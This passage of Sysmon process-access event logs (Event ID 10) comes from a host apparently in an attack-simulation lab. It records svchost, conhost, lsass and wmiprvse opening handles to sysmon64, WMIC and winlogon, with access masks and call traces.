07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+